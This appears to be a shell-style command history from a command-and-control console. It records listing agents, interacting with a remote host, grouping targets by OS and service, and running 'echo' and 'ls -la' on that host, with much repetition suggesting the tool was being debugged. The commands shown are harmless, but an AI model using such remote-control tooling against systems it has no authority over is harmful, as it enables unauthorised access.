1773 | # 2021-03-24 14:34:15.390885
1774 | +back
1775 |
1776 | # 2021-03-24 14:34:16.156066
1777 | +agents
1778 |
1779 | # 2021-03-24 14:34:25.358148
1780 | +interact a 127.0.0.1
1781 |
1782 | # 2021-03-24 14:34:27.285676
1783 | +ping
1784 |
1785 | # 2021-03-24 14:34:28.675463
1786 | +back
1787 |
1788 | # 2021-03-24 14:34:29.589773
1789 | +agents
1790 |
1791 | # 2021-03-24 14:34:55.095128
1792 | +clear
1793 |
1794 | # 2021-03-24 14:38:19.648082
1795 | +help
1796 |
1797 | # 2021-03-24 14:39:05.657278
1798 | +agents
1799 |
1800 | # 2021-03-24 14:39:12.593189
1801 | +interact a 129.21.103.180
1802 |
1803 | # 2021-03-24 14:39:13.750310
1804 | +ping
1805 |
1806 | # 2021-03-24 14:39:15.198436
1807 | +back
1808 |
1809 | # 2021-03-24 14:39:16.432026
1810 | +agents
1811 |
1812 | # 2021-03-24 14:40:47.391767
1813 | +db
1814 |
1815 | # 2021-03-24 14:40:48.986667
1816 | +list
1817 |
1818 | # 2021-03-24 14:42:01.451723
1819 | +help
1820 |
1821 | # 2021-03-24 14:42:10.544693
1822 | +group 129.21.103.180 os windows
1823 |
1824 | # 2021-03-24 14:42:13.883371
1825 | +agents
1826 |
1827 | # 2021-03-24 14:42:15.633328
1828 | +list
1829 |
1830 | # 2021-03-24 14:42:46.926699
1831 | +agents
1832 |
1833 | # 2021-03-24 14:42:47.662534
1834 | +list
1835 |
1836 | # 2021-03-24 14:43:14.377309
1837 | +group 129.21.103.180 service smb
1838 |
1839 | # 2021-03-24 14:43:17.566160
1840 | +list
1841 |
1842 | # 2021-03-24 14:43:34.258886
1843 | +help
1844 |
1845 | # 2021-03-24 14:43:53.728869
1846 | +back
1847 |
1848 | # 2021-03-24 14:43:55.532851
1849 | +help
1850 |
1851 | # 2021-03-24 14:44:00.478875
1852 | +interact a 129.21.103.180
1853 |
1854 | # 2021-03-24 14:44:01.533968
1855 | +ping
1856 |
1857 | # 2021-03-24 14:44:04.865876
1858 | +back
1859 |
1860 | # 2021-03-24 14:44:05.892392
1861 | +agents
1862 |
1863 | # 2021-03-24 14:45:35.255278
1864 | +exit
1865 |
1866 | # 2021-03-24 14:45:49.979294
1867 | +agents
1868 |
1869 | # 2021-03-24 14:46:06.937621
1870 | +removeall
1871 |
1872 | # 2021-03-24 14:46:08.562041
1873 | +db
1874 |
1875 | # 2021-03-24 14:46:10.061097
1876 | +removeall
1877 |
1878 | # 2021-03-24 14:46:15.750221
1879 | +back
1880 |
1881 | # 2021-03-24 14:46:18.946756
1882 | +shutdown
1883 |
1884 | # 2021-03-24 14:46:25.382170
1885 | +agents
1886 |
1887 | # 2021-03-24 14:46:27.248319
1888 | +exit
1889 |
1890 | # 2021-03-24 14:52:03.781593
1891 | +interact a 129.21.103.180
1892 |
1893 | # 2021-03-24 14:52:04.840777
1894 | +ping
1895 |
1896 | # 2021-03-24 14:52:07.654053
1897 | +back
1898 |
1899 | # 2021-03-24 14:52:10.059836
1900 | +db
1901 |
1902 | # 2021-03-24 14:52:11.763834
1903 | +group 129.21.103.180 service smb
1904 |
1905 | # 2021-03-24 14:52:14.396839
1906 | +back
1907 |
1908 | # 2021-03-24 14:52:19.382361
1909 | +interact s smb
1910 |
1911 | # 2021-03-24 14:52:21.417829
1912 | +help
1913 |
1914 | # 2021-03-24 14:52:23.205750
1915 | +list
1916 |
1917 | # 2021-03-24 14:53:33.292597
1918 | +back
1919 |
1920 | # 2021-03-24 14:53:34.528122
1921 | +agents
1922 |
1923 | # 2021-03-24 14:55:52.576889
1924 | +db
1925 |
1926 | # 2021-03-24 14:55:55.252954
1927 | +removeall
1928 |
1929 | # 2021-03-24 14:55:58.358251
1930 | +back
1931 |
1932 | # 2021-03-24 14:55:59.019957
1933 | +exit
1934 |
1935 | # 2021-03-24 15:01:02.820409
1936 | +agents
1937 |
1938 | # 2021-03-24 15:01:08.964568
1939 | +interact a 129.21.103.180
1940 |
1941 | # 2021-03-24 15:01:09.941119
1942 | +ping
1943 |
1944 | # 2021-03-24 15:01:11.238828
1945 | +back
1946 |
1947 | # 2021-03-24 15:01:12.038986
1948 | +agents
1949 |
1950 | # 2021-03-24 15:03:09.905127
1951 | +exit
1952 |
1953 | # 2021-03-24 15:03:12.755452
1954 | +agents
1955 |
1956 | # 2021-03-24 15:04:33.034473
1957 | +group 129.21.103.180 service smb
1958 |
1959 | # 2021-03-24 15:04:34.784370
1960 | +db
1961 |
1962 | # 2021-03-24 15:04:36.063772
1963 | +group 129.21.103.180 service smb
1964 |
1965 | # 2021-03-24 15:04:48.764736
1966 | +group 129.21.103.180 os windowsoperatingsystem
1967 |
1968 | # 2021-03-24 15:04:51.857437
1969 | +back
1970 |
1971 | # 2021-03-24 15:04:52.733867
1972 | +agents
1973 |
1974 | # 2021-03-24 15:06:01.041577
1975 | +exit
1976 |
1977 | # 2021-03-24 15:06:04.122745
1978 | +agents
1979 |
1980 | # 2021-03-24 15:06:19.638159
1981 | +agnets
1982 |
1983 | # 2021-03-24 15:06:21.009790
1984 | +agents
1985 |
1986 | # 2021-03-24 15:10:06.302519
1987 | +help
1988 |
1989 | # 2021-03-24 15:10:14.535211
1990 | +db
1991 |
1992 | # 2021-03-24 15:10:18.306259
1993 | +group 1.1.1.1 os windows
1994 |
1995 | # 2021-03-24 15:10:21.343937
1996 | +list
1997 |
1998 | # 2021-03-24 15:10:23.063125
1999 | +agents
2000 |
2001 | # 2021-03-24 15:10:37.079901
2002 | +removeall
2003 |
2004 | # 2021-03-24 15:21:13.519336
2005 | +db
2006 |
2007 | # 2021-03-24 15:21:24.021779
2008 | +group 10.1-10.1.1 os windows
2009 |
2010 | # 2021-03-24 15:32:05.812317
2011 | +agents
2012 |
2013 | # 2021-03-24 15:32:11.583002
2014 | +db
2015 |
2016 | # 2021-03-24 15:32:13.298773
2017 | +group 10.1-10.1.1 os windows
2018 |
2019 | # 2021-03-24 15:32:28.694852
2020 | +group 10.1-10.1.1 service ftp
2021 |
2022 | # 2021-03-24 15:32:49.045018
2023 | +db
2024 |
2025 | # 2021-03-24 15:32:50.246655
2026 | +group 10.1-10.1.1 service ftp
2027 |
2028 | # 2021-03-24 15:33:13.048341
2029 | +group
2030 |
2031 | # 2021-03-24 15:33:21.490741
2032 | +group 10.1.1.1 os windows
2033 |
2034 | # 2021-03-24 15:33:28.850472
2035 | +group 10.1-10.1.1 service ftp
2036 |
2037 | # 2021-03-24 15:35:06.293361
2038 | +back
2039 |
2040 | # 2021-03-24 15:35:06.880700
2041 | +exit
2042 |
2043 | # 2021-03-24 15:35:10.709987
2044 | +db
2045 |
2046 | # 2021-03-24 15:35:12.452939
2047 | +group 10.1-10.1.1 service ftp
2048 |
2049 | # 2021-03-24 15:35:38.669361
2050 | +removeall
2051 |
2052 | # 2021-03-24 15:35:41.043086
2053 | +agents
2054 |
2055 | # 2021-03-24 15:35:47.102073
2056 | +back
2057 |
2058 | # 2021-03-24 15:35:47.589672
2059 | +exit
2060 |
2061 | # 2021-03-24 15:47:57.542411
2062 | +d
2063 |
2064 | # 2021-03-24 15:47:58.496490
2065 | +db
2066 |
2067 | # 2021-03-24 15:48:00.093982
2068 | +group 10.1-10.1.1 service ftp
2069 |
2070 | # 2021-03-24 15:48:29.154605
2071 | +back
2072 |
2073 | # 2021-03-24 15:48:29.701326
2074 | +exit
2075 |
2076 | # 2021-03-24 15:48:32.784349
2077 | +db
2078 |
2079 | # 2021-03-24 15:48:34.236551
2080 | +group 10.1-10.1.1 service ftp
2081 |
2082 | # 2021-03-24 15:53:22.533293
2083 | +db
2084 |
2085 | # 2021-03-24 15:53:23.816542
2086 | +group 10.1-10.1.1 service ftp
2087 |
2088 | # 2021-03-24 15:53:52.688215
2089 | +db
2090 |
2091 | # 2021-03-24 15:53:53.662062
2092 | +group 10.1-10.1.1 service ftp
2093 |
2094 | # 2021-03-24 15:54:02.617574
2095 | +back
2096 |
2097 | # 2021-03-24 15:54:03.186968
2098 | +exit
2099 |
2100 | # 2021-03-24 15:54:26.706989
2101 | +db
2102 |
2103 | # 2021-03-24 15:54:27.808460
2104 | +group 10.1-10.1.1 service ftp
2105 |
2106 | # 2021-03-24 15:55:02.256767
2107 | +db
2108 |
2109 | # 2021-03-24 15:55:03.708496
2110 | +group 10.1-10.1.1 service ftp
2111 |
2112 | # 2021-03-24 15:55:06.037722
2113 | +back
2114 |
2115 | # 2021-03-24 15:55:06.651542
2116 | +exit
2117 |
2118 | # 2021-03-24 16:06:39.287388
2119 | +claer
2120 |
2121 | # 2021-03-24 16:06:40.372326
2122 | +clear
2123 |
2124 | # 2021-03-24 16:06:41.347097
2125 | +db
2126 |
2127 | # 2021-03-24 16:06:42.579910
2128 | +group 10.1-10.1.1 service ftp
2129 |
2130 | # 2021-03-24 16:06:57.006543
2131 | +back
2132 |
2133 | # 2021-03-24 16:06:57.559532
2134 | +exit
2135 |
2136 | # 2021-03-24 16:07:01.413301
2137 | +db
2138 |
2139 | # 2021-03-24 16:07:03.120038
2140 | +group 10.1-10.1.1 service ftp
2141 |
2142 | # 2021-03-24 16:07:06.534236
2143 | +db
2144 |
2145 | # 2021-03-24 16:07:07.858007
2146 | +removeall
2147 |
2148 | # 2021-03-24 16:07:38.638305
2149 | +back
2150 |
2151 | # 2021-03-24 16:07:39.202600
2152 | +exit
2153 |
2154 | # 2021-03-24 16:07:45.226315
2155 | +clear
2156 |
2157 | # 2021-03-24 16:07:45.717672
2158 | +db
2159 |
2160 | # 2021-03-24 16:07:46.939055
2161 | +group 10.1-10.1.1 service ftp
2162 |
2163 | # 2021-03-24 16:08:22.093748
2164 | +clear
2165 |
2166 | # 2021-03-24 16:08:23.581790
2167 | +db
2168 |
2169 | # 2021-03-24 16:08:24.685413
2170 | +group 10.1-10.1.1 service ftp
2171 |
2172 | # 2021-03-24 16:09:42.279267
2173 | +back
2174 |
2175 | # 2021-03-24 16:09:43.361296
2176 | +exit
2177 |
2178 | # 2021-03-24 16:09:46.748161
2179 | +db
2180 |
2181 | # 2021-03-24 16:09:47.896013
2182 | +group 10.1-10.1.1 service ftp
2183 |
2184 | # 2021-03-24 16:10:03.132841
2185 | +group 10.1.1-10.10 service ftp
2186 |
2187 | # 2021-03-24 16:10:55.787878
2188 | +back
2189 |
2190 | # 2021-03-24 16:10:56.381628
2191 | +exit
2192 |
2193 | # 2021-03-24 16:10:59.013781
2194 | +clear
2195 |
2196 | # 2021-03-24 16:10:59.712389
2197 | +db
2198 |
2199 | # 2021-03-24 16:11:02.557825
2200 | +group 10.1.1-10.10 service ftp
2201 |
2202 | # 2021-03-24 16:11:27.975478
2203 | +back
2204 |
2205 | # 2021-03-24 16:11:28.922236
2206 | +exit
2207 |
2208 | # 2021-03-24 16:11:31.606717
2209 | +clear
2210 |
2211 | # 2021-03-24 16:11:32.156926
2212 | +db
2213 |
2214 | # 2021-03-24 16:11:33.497532
2215 | +group 10.1.1-10.10 service ftp
2216 |
2217 | # 2021-03-24 16:12:42.961694
2218 | +back
2219 |
2220 | # 2021-03-24 16:12:43.517402
2221 | +exit
2222 |
2223 | # 2021-03-24 16:12:46.130317
2224 | +clear
2225 |
2226 | # 2021-03-24 16:12:49.229616
2227 | +db
2228 |
2229 | # 2021-03-24 16:12:50.353921
2230 | +group 10.1.1-10.10 service ftp
2231 |
2232 | # 2021-03-24 16:13:15.133189
2233 | +back
2234 |
2235 | # 2021-03-24 16:13:15.812547
2236 | +exit
2237 |
2238 | # 2021-03-24 16:13:19.997554
2239 | +clear
2240 |
2241 | # 2021-03-24 16:13:21.305400
2242 | +db
2243 |
2244 | # 2021-03-24 16:13:23.094831
2245 | +group 10.1.1-10.10 service ftp
2246 |
2247 | # 2021-03-24 16:13:35.465235
2248 | +group 10.1-11.10.10 service ftp
2249 |
2250 | # 2021-03-24 16:13:50.541286
2251 | +group 1-10.1.1.1. service ftp
2252 |
2253 | # 2021-03-24 16:14:02.428118
2254 | +agetn
2255 |
2256 | # 2021-03-24 16:14:03.478947
2257 | +agents
2258 |
2259 | # 2021-03-24 16:14:15.547320
2260 | +db
2261 |
2262 | # 2021-03-24 16:14:25.342294
2263 | +group 1.1.1.1-10 os windows
2264 |
2265 | # 2021-03-24 16:21:33.073854
2266 | +db
2267 |
2268 | # 2021-03-24 16:21:34.503955
2269 | +group 1.1.1.1-10 os windows
2270 |
2271 | # 2021-03-24 16:22:42.477816
2272 | +db
2273 |
2274 | # 2021-03-24 16:22:43.699381
2275 | +group 1.1.1.1-10 os windows
2276 |
2277 | # 2021-03-24 16:23:39.027076
2278 | +db
2279 |
2280 | # 2021-03-24 16:23:42.541102
2281 | +group 1-10.1.1.1. service ftp
2282 |
2283 | # 2021-03-24 16:23:58.323123
2284 | +group 1-10.1.1.1 service ftp
2285 |
2286 | # 2021-03-24 16:43:50.249843
2287 | +db
2288 |
2289 | # 2021-03-24 16:43:53.511438
2290 | +group 1-10.1.1.1 service ftp
2291 |
2292 | # 2021-03-24 16:44:03.098476
2293 | +group 1.1-10.1.1 service ftp
2294 |
2295 | # 2021-03-24 16:44:14.333166
2296 | +group 1.1.1-10.1 service ftp
2297 |
2298 | # 2021-03-24 16:44:30.319560
2299 | +group 1.1.1.1-10 service ftp
2300 |
2301 | # 2021-03-24 16:47:23.615736
2302 | +db
2303 |
2304 | # 2021-03-24 16:47:29.347376
2305 | +group 1.1.1-10.1 service ftp
2306 |
2307 | # 2021-03-24 16:47:37.079888
2308 | +group 1.1-10.1.1 service ftp
2309 |
2310 | # 2021-03-24 16:48:48.530780
2311 | +db
2312 |
2313 | # 2021-03-24 16:48:50.038992
2314 | +group 1.1-10.1.1 service ftp
2315 |
2316 | # 2021-03-24 16:48:54.081413
2317 | +group 1-10.1.1.1 service ftp
2318 |
2319 | # 2021-03-24 16:48:58.173099
2320 | +group 1.1.1-10.1 service ftp
2321 |
2322 | # 2021-03-24 16:49:03.476636
2323 | +group 1.1.1.1-10 service ftp
2324 |
2325 | # 2021-03-24 16:49:36.515074
2326 | +back
2327 |
2328 | # 2021-03-24 16:49:37.092154
2329 | +exit
2330 |
2331 | # 2021-03-24 16:49:41.343800
2332 | +db
2333 |
2334 | # 2021-03-24 16:49:42.899423
2335 | +group 1.1.1.1-10 service ftp
2336 |
2337 | # 2021-03-24 16:49:47.908748
2338 | +agents
2339 |
2340 | # 2021-03-24 16:49:51.618102
2341 | +removeall
2342 |
2343 | # 2021-03-24 16:49:56.610993
2344 | +back
2345 |
2346 | # 2021-03-24 16:49:57.677905
2347 | +exit
2348 |
2349 | # 2021-03-24 16:51:07.665733
2350 | +db
2351 |
2352 | # 2021-03-24 16:51:08.916881
2353 | +group 1.1.1.1-10 service ftp
2354 |
2355 | # 2021-03-24 16:51:15.649178
2356 | +group 1-10.1.1.1 service ftp
2357 |
2358 | # 2021-03-24 16:51:21.566199
2359 | +group 1.1-10.1.1 service ftp
2360 |
2361 | # 2021-03-24 16:51:26.832739
2362 | +group 1.1.1-10.1 service ftp
2363 |
2364 | # 2021-03-24 16:51:30.400357
2365 | +clear
2366 |
2367 | # 2021-03-24 16:51:31.392803
2368 | +back
2369 |
2370 | # 2021-03-24 16:51:33.031596
2371 | +agents
2372 |
2373 | # 2021-03-24 16:51:35.033809
2374 | +exit
2375 |
2376 | # 2021-03-24 16:53:57.340703
2377 | +db
2378 |
2379 | # 2021-03-24 16:53:59.072050
2380 | +group 1.1.1-10.1 service ftp
2381 |
2382 | # 2021-03-24 16:54:30.177257
2383 | +db
2384 |
2385 | # 2021-03-24 16:54:31.512880
2386 | +group 1.1.1-10.1 service ftp
2387 |
2388 | # 2021-03-24 16:54:56.893619
2389 | +back
2390 |
2391 | # 2021-03-24 16:54:57.466094
2392 | +exit
2393 |
2394 | # 2021-03-24 16:55:00.296015
2395 | +db
2396 |
2397 | # 2021-03-24 16:55:01.381217
2398 | +group 1.1.1-10.1 service ftp
2399 |
2400 | # 2021-03-24 16:55:24.692586
2401 | +db
2402 |
2403 | # 2021-03-24 16:55:25.640842
2404 | +group 1.1.1-10.1 service ftp
2405 |
2406 | # 2021-03-24 16:55:47.391106
2407 | +agents
2408 |
2409 | # 2021-03-24 16:55:48.846422
2410 | +back
2411 |
2412 | # 2021-03-24 16:55:50.672958
2413 | +agents
2414 |
2415 | # 2021-03-24 16:55:52.652047
2416 | +exit
2417 |
2418 | # 2021-03-24 16:57:36.805683
2419 | +agents
2420 |
2421 | # 2021-03-24 16:57:45.128464
2422 | +interact a 129.21.103.180
2423 |
2424 | # 2021-03-24 16:57:45.895210
2425 | +ping
2426 |
2427 | # 2021-03-24 16:57:48.005994
2428 | +agents
2429 |
2430 | # 2021-03-24 16:57:49.522182
2431 | +bac
2432 |
2433 | # 2021-03-24 16:57:52.516812
2434 | +list
2435 |
2436 | # 2021-03-24 16:58:04.756632
2437 | +db
2438 |
2439 | # 2021-03-24 16:58:05.706782
2440 | +removeall
2441 |
2442 | # 2021-03-24 16:58:08.100553
2443 | +back
2444 |
2445 | # 2021-03-24 16:58:10.445364
2446 | +interact a 129.21.103.180
2447 |
2448 | # 2021-03-24 16:58:11.310762
2449 | +ping
2450 |
2451 | # 2021-03-24 16:58:13.435109
2452 | +list
2453 |
2454 | # 2021-03-24 16:58:14.673698
2455 | +back
2456 |
2457 | # 2021-03-24 16:58:16.388828
2458 | +agents
2459 |
2460 | # 2021-03-24 16:58:20.312351
2461 | +exit
2462 |
2463 | # 2021-03-24 22:40:24.236426
2464 | +help
2465 |
2466 | # 2021-03-24 22:40:25.466468
2467 | +db
2468 |
2469 | # 2021-03-24 22:40:31.417042
2470 | +help
2471 |
2472 | # 2021-03-24 22:40:37.226395
2473 | +group 10.1.1-15.3 service SMB
2474 |
2475 | # 2021-03-24 22:40:47.113985
2476 | +agents
2477 |
2478 | # 2021-03-24 22:40:55.672824
2479 | +back
2480 |
2481 | # 2021-03-24 22:40:58.101465
2482 | +interact a 129.21.103.180
2483 |
2484 | # 2021-03-24 22:40:59.063883
2485 | +ping
2486 |
2487 | # 2021-03-24 22:41:01.063019
2488 | +list
2489 |
2490 | # 2021-03-24 22:41:03.516742
2491 | +back
2492 |
2493 | # 2021-03-24 22:41:04.660878
2494 | +agents
2495 |
2496 | # 2021-03-24 22:41:07.764873
2497 | +exit
2498 |
2499 | # 2021-03-25 11:14:15.282575
2500 | +agents
2501 |
2502 | # 2021-03-25 11:14:17.785337
2503 | +exit
2504 |
2505 | # 2021-03-25 11:22:28.572241
2506 | +agents
2507 |
2508 | # 2021-03-25 11:22:31.917555
2509 | +interact a 129.21.103.180
2510 |
2511 | # 2021-03-25 11:22:33.352369
2512 | +agents
2513 |
2514 | # 2021-03-25 11:25:51.928511
2515 | +interact a 129.21.103.180
2516 |
2517 | # 2021-03-25 11:25:52.953406
2518 | +agents
2519 |
2520 | # 2021-03-25 11:26:00.957752
2521 | +back
2522 |
2523 | # 2021-03-25 11:26:05.127753
2524 | +interact os windows
2525 |
2526 | # 2021-03-25 11:26:07.334549
2527 | +agents
2528 |
2529 | # 2021-03-25 11:26:09.737522
2530 | +back
2531 |
2532 | # 2021-03-25 11:26:14.023680
2533 | +agents
2534 |
2535 | # 2021-03-25 11:26:47.358159
2536 | +db
2537 |
2538 | # 2021-03-25 11:26:56.907926
2539 | +group 129.21.103.180 os macos
2540 |
2541 | # 2021-03-25 11:26:58.488587
2542 | +back
2543 |
2544 | # 2021-03-25 11:26:59.438631
2545 | +agents
2546 |
2547 | # 2021-03-25 11:27:14.094875
2548 | +interact os macos
2549 |
2550 | # 2021-03-25 11:27:17.885241
2551 | +agents
2552 |
2553 | # 2021-03-25 11:27:21.542022
2554 | +back
2555 |
2556 | # 2021-03-25 11:27:33.377875
2557 | +db
2558 |
2559 | # 2021-03-25 11:27:39.989860
2560 | +group 49.1.101.104 os macos
2561 |
2562 | # 2021-03-25 11:27:41.214004
2563 | +back
2564 |
2565 | # 2021-03-25 11:27:44.139323
2566 | +interact os macos
2567 |
2568 | # 2021-03-25 11:27:45.412307
2569 | +agents
2570 |
2571 | # 2021-03-25 11:27:48.945699
2572 | +back
2573 |
2574 | # 2021-03-25 11:27:50.463500
2575 | +agents
2576 |
2577 | # 2021-03-25 11:27:56.974599
2578 | +interact a 129.21.103.180
2579 |
2580 | # 2021-03-25 11:27:58.814393
2581 | +ping
2582 |
2583 | # 2021-03-25 11:28:00.563067
2584 | +agents
2585 |
2586 | # 2021-03-25 11:28:01.493104
2587 | +back
2588 |
2589 | # 2021-03-25 11:28:02.798490
2590 | +agnets
2591 |
2592 | # 2021-03-25 11:28:04.106294
2593 | +agents
2594 |
2595 | # 2021-03-25 11:28:07.455393
2596 | +exit
2597 |
2598 | # 2021-03-25 11:28:44.998126
2599 | +db
2600 |
2601 | # 2021-03-25 11:28:46.400060
2602 | +removeall
2603 |
2604 | # 2021-03-25 11:28:48.802930
2605 | +back
2606 |
2607 | # 2021-03-25 11:28:53.319394
2608 | +interact a 129.21.103.180
2609 |
2610 | # 2021-03-25 11:28:54.516025
2611 | +ping
2612 |
2613 | # 2021-03-25 11:28:55.681697
2614 | +back
2615 |
2616 | # 2021-03-25 11:28:56.528223
2617 | +agents
2618 |
2619 | # 2021-03-25 11:28:58.694115
2620 | +exit
2621 |
2622 | # 2021-03-25 11:29:15.429775
2623 | +db
2624 |
2625 | # 2021-03-25 11:29:18.969909
2626 | +group 129.21.103.180 os macos
2627 |
2628 | # 2021-03-25 11:29:26.574695
2629 | +group 129.21.103.180 service ssh
2630 |
2631 | # 2021-03-25 11:29:29.130659
2632 | +agents
2633 |
2634 | # 2021-03-25 11:29:30.491303
2635 | +back
2636 |
2637 | # 2021-03-25 11:29:31.142602
2638 | +exit
2639 |
2640 | # 2021-03-25 11:29:43.077719
2641 | +db
2642 |
2643 | # 2021-03-25 11:29:49.606032
2644 | +group 129.21.103.180 service rocketchatbygrammy
2645 |
2646 | # 2021-03-25 11:29:50.767690
2647 | +back
2648 |
2649 | # 2021-03-25 11:29:51.822272
2650 | +agents
2651 |
2652 | # 2021-03-25 11:29:55.414143
2653 | +exit
2654 |
2655 | # 2021-03-25 11:31:05.483833
2656 | +db
2657 |
2658 | # 2021-03-25 11:31:06.578844
2659 | +help
2660 |
2661 | # 2021-03-25 11:31:17.130508
2662 | +agents
2663 |
2664 | # 2021-03-25 11:31:20.773534
2665 | +exit
2666 |
2667 | # 2021-03-25 13:25:26.514903
2668 | +mesa
2669 |
2670 | # 2021-03-25 13:25:28.096758
2671 | +clear
2672 |
2673 | # 2021-03-25 13:25:29.348949
2674 | +agents
2675 |
2676 | # 2021-03-25 13:25:32.652412
2677 | +exit
2678 |
2679 | # 2021-03-25 13:29:01.135231
2680 | +interact a 129.21.103.180
2681 |
2682 | # 2021-03-25 13:29:01.910294
2683 | +cmd
2684 |
2685 | # 2021-03-25 13:29:12.087695
2686 | +echo "hello what's good"
2687 |
2688 | # 2021-03-25 13:29:32.101182
2689 | +back
2690 |
2691 | # 2021-03-25 13:29:32.762852
2692 | +exit
2693 |
2694 | # 2021-03-25 13:32:35.167814
2695 | +interact a 129.21.103.180
2696 |
2697 | # 2021-03-25 13:32:35.897292
2698 | +cmd
2699 |
2700 | # 2021-03-25 13:32:37.730562
2701 | +echo "hello what's good"
2702 |
2703 | # 2021-03-25 13:33:10.255295
2704 | +back
2705 |
2706 | # 2021-03-25 13:33:13.120238
2707 | +exit
2708 |
2709 | # 2021-03-25 13:36:38.175981
2710 | +agetns
2711 |
2712 | # 2021-03-25 13:36:39.944566
2713 | +agents
2714 |
2715 | # 2021-03-25 13:36:43.684677
2716 | +exit
2717 |
2718 | # 2021-03-25 13:54:17.092138
2719 | +interact a 129.21.103.180
2720 |
2721 | # 2021-03-25 13:54:18.053329
2722 | +cmd
2723 |
2724 | # 2021-03-25 13:54:22.697664
2725 | +echo "hello what's good"
2726 |
2727 | # 2021-03-25 13:57:55.128063
2728 | +interact a 129.21.103.180
2729 |
2730 | # 2021-03-25 13:57:55.769518
2731 | +cmd
2732 |
2733 | # 2021-03-25 13:57:57.078391
2734 | +echo "hello what's good"
2735 |
2736 | # 2021-03-25 13:59:02.484110
2737 | +interact a 129.21.103.180
2738 |
2739 | # 2021-03-25 13:59:06.244603
2740 | +cmd
2741 |
2742 | # 2021-03-25 13:59:10.692016
2743 | +echo "hello what's good"
2744 |
2745 | # 2021-03-25 13:59:53.869624
2746 | +back
2747 |
2748 | # 2021-03-25 14:00:13.472407
2749 | +interact a 129.21.103.180
2750 |
2751 | # 2021-03-25 14:00:14.209748
2752 | +cmd
2753 |
2754 | # 2021-03-25 14:00:15.344236
2755 | +echo "hello what's good"
2756 |
2757 | # 2021-03-25 14:00:46.536370
2758 | +back
2759 |
2760 | # 2021-03-25 14:00:48.173323
2761 | +agents
2762 |
2763 | # 2021-03-25 14:01:01.277917
2764 | +exit
2765 |
2766 | # 2021-03-25 14:01:21.091122
2767 | +db
2768 |
2769 | # 2021-03-25 14:01:21.956753
2770 | +removeall
2771 |
2772 | # 2021-03-25 14:01:23.551160
2773 | +back
2774 |
2775 | # 2021-03-25 14:01:25.118202
2776 | +exit
2777 |
2778 | # 2021-03-25 17:39:02.232388
2779 | +interact a 129.21.103.180
2780 |
2781 | # 2021-03-25 17:39:03.843406
2782 | +ping
2783 |
2784 | # 2021-03-25 17:39:07.444767
2785 | +cmd
2786 |
2787 | # 2021-03-25 17:39:08.558789
2788 | +ls
2789 |
2790 | # 2021-03-25 17:39:11.585224
2791 | +ls -la
2792 |
2793 | # 2021-03-25 17:39:12.659411
2794 | +back
2795 |
2796 | # 2021-03-25 17:39:14.421395
2797 | +exit
2798 |
2799 | # 2021-03-25 17:40:17.281416
2800 | +interact a 129.21.103.180
2801 |
2802 | # 2021-03-25 17:40:18.335492
2803 | +cmd
2804 |
2805 | # 2021-03-25 17:40:20.025844
2806 | +ls -la
2807 |
2808 | # 2021-03-25 17:53:50.966108
2809 | +interact a 129.21.103.180
2810 |
2811 | # 2021-03-25 17:53:51.888046
2812 | +cmd
2813 |
2814 | # 2021-03-25 17:53:53.909925
2815 | +ls -la
2816 |
2817 | # 2021-03-25 17:55:32.133451
2818 | +interact a 129.21.103.180
2819 |
2820 | # 2021-03-25 17:55:34.357952
2821 | +cmd
2822 |
2823 | # 2021-03-25 17:55:40.532529
2824 | +ls -la
2825 |
2826 | # 2021-03-25 17:56:17.669753
2827 | +interact a 129.21.103.180
2828 |
2829 | # 2021-03-25 17:56:18.302864
2830 | +cmd
2831 |
2832 | # 2021-03-25 17:56:19.317039
2833 | +ls
2834 |
2835 | # 2021-03-25 17:56:50.792349
2836 | +interact a 129.21.103.180
2837 |
2838 | # 2021-03-25 17:56:51.949005
2839 | +cmd
2840 |
2841 | # 2021-03-25 17:56:53.049606
2842 | +ls
2843 |
2844 | # 2021-03-25 17:57:07.898175
2845 | +interact a 129.21.103.180
2846 |
2847 | # 2021-03-25 17:57:08.479701
2848 | +cmd
2849 |
2850 | # 2021-03-25 17:57:08.957389
2851 | +ls
2852 |
2853 | # 2021-03-25 18:02:51.878332
2854 | +interact a 129.21.103.180
2855 |
2856 | # 2021-03-25 18:02:53.078029
2857 | +cmd
2858 |
2859 | # 2021-03-25 18:02:53.770584
2860 | +ls
2861 |
2862 | # 2021-03-25 18:03:22.740566
2863 | +ls -la
2864 |
2865 | # 2021-03-25 18:10:07.655064
2866 | +interact a 129.21.103.180
2867 |
2868 | # 2021-03-25 18:10:08.344891
2869 | +cmd
2870 |
2871 | # 2021-03-25 18:10:08.792684
2872 | +ls
2873 |
2874 | # 2021-03-25 18:10:11.223745
2875 | +ls -la
2876 |
2877 | # 2021-03-25 18:12:56.204484
2878 | +interact a 129.21.103.180
2879 |
2880 | # 2021-03-25 18:12:56.929290
2881 | +cmd
2882 |
2883 | # 2021-03-25 18:12:57.321021
2884 | +ls
2885 |
2886 | # 2021-03-25 18:12:59.914591
2887 | +ls -la
2888 |
2889 | # 2021-03-25 18:14:10.379782
2890 | +interact a 129.21.103.180
2891 |
2892 | # 2021-03-25 18:14:11.206684
2893 | +cm
2894 |
2895 | # 2021-03-25 18:14:12.948643
2896 | +cmd
2897 |
2898 | # 2021-03-25 18:14:14.081835
2899 | +ls
2900 |
2901 | # 2021-03-25 18:16:19.504317
2902 | +interact a 129.21.103.180
2903 |
2904 | # 2021-03-25 18:16:20.018925
2905 | +cmd
2906 |
2907 | # 2021-03-25 18:16:20.524201
2908 | +ls
2909 |
2910 | # 2021-03-25 18:16:52.510061
2911 | +interact a 129.21.103.180
2912 |
2913 | # 2021-03-25 18:16:53.084825
2914 | +cmd
2915 |
2916 | # 2021-03-25 18:16:53.491890
2917 | +ls
2918 |
2919 | # 2021-03-25 18:17:03.016714
2920 | +ls -la
2921 |
2922 | # 2021-03-25 18:17:14.347509
2923 | +agents
2924 |
2925 | # 2021-03-25 18:17:17.628286
2926 | +back
2927 |
2928 | # 2021-03-25 18:17:33.351878
2929 | +agents
2930 |
2931 | # 2021-03-25 18:17:36.978314
2932 | +db
2933 |
2934 | # 2021-03-25 18:17:37.975398
2935 | +removeall
2936 |
2937 | # 2021-03-25 18:17:39.688974
2938 | +exit
2939 |
2940 | # 2021-03-25 18:19:27.078703
2941 | +interact a 129.21.103.180
2942 |
2943 | # 2021-03-25 18:19:27.912564
2944 | +cmd
2945 |
2946 | # 2021-03-25 18:19:28.438588
2947 | +ls
2948 |
2949 | # 2021-03-25 18:19:31.474877
2950 | +ls -la
2951 |
2952 | # 2021-03-25 18:19:56.768200
2953 | +ls
2954 |
2955 | # 2021-03-25 18:19:58.285929
2956 | +ls -la
2957 |
2958 | # 2021-03-25 18:22:06.831325
2959 | +interact a 129.21.103.180
2960 |
